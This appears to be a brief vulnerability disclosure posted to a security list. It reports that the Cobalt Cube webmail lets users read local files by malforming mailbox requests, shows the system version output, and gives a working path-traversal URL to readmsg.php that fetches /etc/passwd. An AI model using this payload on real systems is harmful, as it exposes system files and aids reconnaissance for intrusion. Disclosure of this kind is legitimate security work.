 |
|
|
|
I just got a new Cobalt Cube today and I have been poking around
at it
for security issues... I noticed this minor issue in the webmail
system.
Your
users are not aloud to have shell access by default however if
they
malform their mailbox requests they can read local files with
the perms
of the webserver. If your users have shell access they will not
really
be gaining anything however this could be used to remotely gather
information for a future attack.
[admin admin]$ uname -a
Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586
unknown
[admin admin]$ cat /etc/issue
Cobalt Linux release 6.0 (Carmel)
Kernel 2.2.16C7 on an i586
http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../..
/../../../../../../etc/passwd&id=1
-KF
|
|
|
|
|
|
|
|
